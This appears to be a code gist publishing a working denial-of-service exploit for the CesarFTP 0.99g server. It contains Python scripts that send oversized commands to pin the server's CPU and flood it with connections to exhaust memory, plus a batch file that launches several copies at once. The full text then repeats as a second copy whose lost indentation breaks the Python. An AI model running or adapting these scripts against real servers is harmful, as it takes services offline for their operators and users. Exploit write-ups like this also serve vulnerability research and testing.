decidedlygray/cesar_remoteDOS.py

## cesar_remoteDOS.py
# Exploit Title: CesarFTP 0.99g Remote Resource Exhaustion Vulnerability v4260
# Date: 10/16/2015
# Exploit Author: @decidedlygray (independently discovered while learning Sulley fuzzing framework)
# Vendor Homepage: ACLogic.com [NO LONGER EXISTS]
# Software Link: http://download.cnet.com/CesarFTP/3000-2160_4-13481.html
# Version: 0.99g
# Tested on: Windows XP, Windows 7
#
# Exploit for the issue already discovered in 2004:
#     - CesarFTP Server Long Command Denial of Service Exploit - https://www.exploit-db.com/exploits/428/
#     - ACLogic CesarFTP 0.99 - Remote Resource Exhaustion Vulnerability - https://www.exploit-db.com/exploits/23700/
#
# Details:
#
#     This vulnerability is a remote resource exhaustion / DOS vulnerability.
#
#     By sending an overly long command it is possible to cause the CesarFTP.exe
#     subprocess Server.exe to enter an infinite loop and peg 99% CPU usage.
#
#         ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED
#         ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE CPU USAGE ISSUE
#         ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE
#
#     It appears opening up 3 of these types of connections fills up the connection
#     queue which is never released under these conditions until the client chooses
#     to close the connection. While additional TCP connections are opened to the
#     server, the FTP Server queue is filled so they just sit there unable to auth with
#     the FTP server.
#
#     All additional connection attempts seem to open a socket that
#     isn't closed on the server side even if the client disconnects. These additional
#     connections (after initial 3 DOS/locking connections made) appear in the Cesar
#     running log of connections and aren't cleared until the 3 DOS connections are closed.
#
#     Each additional connection uses additional memory in the Server.exe
#     process which isn't freed until the 3 DOS connections are closed. Server.exe seems
#     to allocated an additional 4K of process memory per additional connection. Some
#     additional memory is also allocated in the CesarFTP.exe process.
#
#     Post: Even if client sends long USER and disconnects the Server.exe stays stuck in
#     its 99% use loop. On WinXP - even if you close CesarFTP.exe the server continues
#     to run and use 99% CPU. It must be manually killed through task manager.

#!/usr/bin/python
import socket

def do_connect():

    # ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE RESOURCE ISSUE
    # ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED BEFORE INPUT IS REJECTED
    # print 'USER is going to be:\n'+ftp_user
    #USER command is irrelevant
    ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    try:
        print 'Connecting'
        s.connect(('192.168.56.104',21))
        data = s.recv(1024)
        print data

        print '\nSending long username...'
        s.send(ftp_user+'\r\n')
        data = s.recv(1024)
        print data

        # Execution never actually makes it here...
        s.send('PASS superfuzzy\r\n')
        data = s.recv(1024)
        print data
        s.close()
        print 'fin.'

    except:
        print 'Oops! Something broke :('
        s.close()

if __name__ == '__main__':
    do_connect()

## cesar_remoteDOS.run.bat
cd %~dp0
start python cesar_remoteDOS.py
start python cesar_remoteDOS.py
start python cesar_remoteDOS.py
REM this one (and all subsequent) will hang beceause the queue is full
start python cesar_remoteDOS.py
pause

## cesar_remoteDOS_exhaust.py
#!/usr/bin/python

"""
 CesarFTP 0.99g Remote Resource Exhaustion Vulnerability
 @decidedlygray 10/16/2015

    CesarFTP memory exhaustion script
    Each new connection attempt uses an additional 4K of memory
    512000K = 512MB
    128000 attempts to fill 512MB of memory?

    Run this after cesar_remoteDOS.run.bat has filled up the conn queue. This
    script will drain the memory of the target (CPU already pegged).
"""

import socket
import select
import time

def do_connect():

    total_connections=128000/4 #manually add 4 workers for faster takedown

    for i in range(1,total_connections):
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.setblocking(0)
        s.settimeout(0.25)
        try:
            print '['+str(i)+'/'+str(total_connections)+'] Connecting'
            s.connect(('192.168.56.104',21))
            # timeout_in_seconds = 1
            # ready = select.select([s], [], [], timeout_in_seconds)
            # if ready[0]:
            #     data = s.recv(4096)
            data = s.recv(1024)
            print data

            print '['+str(i)+'] Sending large data buffer..'
            # ftp_user = 'USER '+'/\\'**32764 ##MAX SIZE ALLOWED
            # note: doesnt need user command, any data will do
            ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE

            s.send(ftp_user+'\r\n')
            data = s.recv(1024) #times out here
            print data

            #Execution never makes it here
            print '['+str(i)+'] Sending password...'
            s.send('PASS test\r\n')
            data = s.recv(1024)
            print data

            s.close()

        except:
            print '['+str(i)+'/'+str(total_connections)+'] Could not connect to FTP!'
            s.close()


if __name__ == '__main__':
    do_connect()
	# Exploit Title: CesarFTP 0.99g Remote Resource Exhaustion Vulnerability v4260
	# Date: 10/16/2015
	# Exploit Author: @decidedlygray (independently discovered while learning Sulley fuzzing framework)
	# Vendor Homepage: ACLogic.com [NO LONGER EXISTS]
	# Software Link: http://download.cnet.com/CesarFTP/3000-2160_4-13481.html
	# Version: 0.99g
	# Tested on: Windows XP, Windows 7
	#
	# Exploit for the issue already discovered in 2004:
	# - CesarFTP Server Long Command Denial of Service Exploit - https://www.exploit-db.com/exploits/428/
	# - ACLogic CesarFTP 0.99 - Remote Resource Exhaustion Vulnerability - https://www.exploit-db.com/exploits/23700/
	#
	# Details:
	#
	# This vulnerability is a remote resource exhaustion / DOS vulnerability.
	#
	# By sending an overly long command it is possible to cause the CesarFTP.exe
	# subprocess Server.exe to enter an infinite loop and peg 99% CPU usage.
	#
	# ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED
	# ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE CPU USAGE ISSUE
	# ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE
	#
	# It appears opening up 3 of these types of connections fills up the connection
	# queue which is never released under these conditions until the client chooses
	# to close the connection. While additional TCP connections are opened to the
	# server, the FTP Server queue is filled so they just sit there unable to auth with
	# the FTP server.
	#
	# All additional connection attempts seem to open a socket that
	# isn't closed on the server side even if the client disconnects. These additional
	# connections (after initial 3 DOS/locking connections made) appear in the Cesar
	# running log of connections and aren't cleared until the 3 DOS connections are closed.
	#
	# Each additional connection uses additional memory in the Server.exe
	# process which isn't freed until the 3 DOS connections are closed. Server.exe seems
	# to allocated an additional 4K of process memory per additional connection. Some
	# additional memory is also allocated in the CesarFTP.exe process.
	#
	# Post: Even if client sends long USER and disconnects the Server.exe stays stuck in
	# its 99% use loop. On WinXP - even if you close CesarFTP.exe the server continues
	# to run and use 99% CPU. It must be manually killed through task manager.

	#!/usr/bin/python
	import socket

	def do_connect():

	# ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE RESOURCE ISSUE
	# ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED BEFORE INPUT IS REJECTED
	# print 'USER is going to be:\n'+ftp_user
	#USER command is irrelevant
	ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE

	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	try:
	print 'Connecting'
	s.connect(('192.168.56.104',21))
	data = s.recv(1024)
	print data

	print '\nSending long username...'
	s.send(ftp_user+'\r\n')
	data = s.recv(1024)
	print data

	# Execution never actually makes it here...
	s.send('PASS superfuzzy\r\n')
	data = s.recv(1024)
	print data
	s.close()
	print 'fin.'

	except:
	print 'Oops! Something broke :('
	s.close()

	if __name__ == '__main__':
	do_connect()
	cd %~dp0
	start python cesar_remoteDOS.py
	start python cesar_remoteDOS.py
	start python cesar_remoteDOS.py
	REM this one (and all subsequent) will hang beceause the queue is full
	start python cesar_remoteDOS.py
	pause
	#!/usr/bin/python

	"""
	CesarFTP 0.99g Remote Resource Exhaustion Vulnerability
	@decidedlygray 10/16/2015

	CesarFTP memory exhaustion script
	Each new connection attempt uses an additional 4K of memory
	512000K = 512MB
	128000 attempts to fill 512MB of memory?

	Run this after cesar_remoteDOS.run.bat has filled up the conn queue. This
	script will drain the memory of the target (CPU already pegged).
	"""

	import socket
	import select
	import time

	def do_connect():

	total_connections=128000/4 #manually add 4 workers for faster takedown

	for i in range(1,total_connections):
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.setblocking(0)
	s.settimeout(0.25)
	try:
	print '['+str(i)+'/'+str(total_connections)+'] Connecting'
	s.connect(('192.168.56.104',21))
	# timeout_in_seconds = 1
	# ready = select.select([s], [], [], timeout_in_seconds)
	# if ready[0]:
	# data = s.recv(4096)
	data = s.recv(1024)
	print data

	print '['+str(i)+'] Sending large data buffer..'
	# ftp_user = 'USER '+'/\\'**32764 ##MAX SIZE ALLOWED
	# note: doesnt need user command, any data will do
	ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE

	s.send(ftp_user+'\r\n')
	data = s.recv(1024) #times out here
	print data

	#Execution never makes it here
	print '['+str(i)+'] Sending password...'
	s.send('PASS test\r\n')
	data = s.recv(1024)
	print data

	s.close()

	except:
	print '['+str(i)+'/'+str(total_connections)+'] Could not connect to FTP!'
	s.close()


	if __name__ == '__main__':
	do_connect()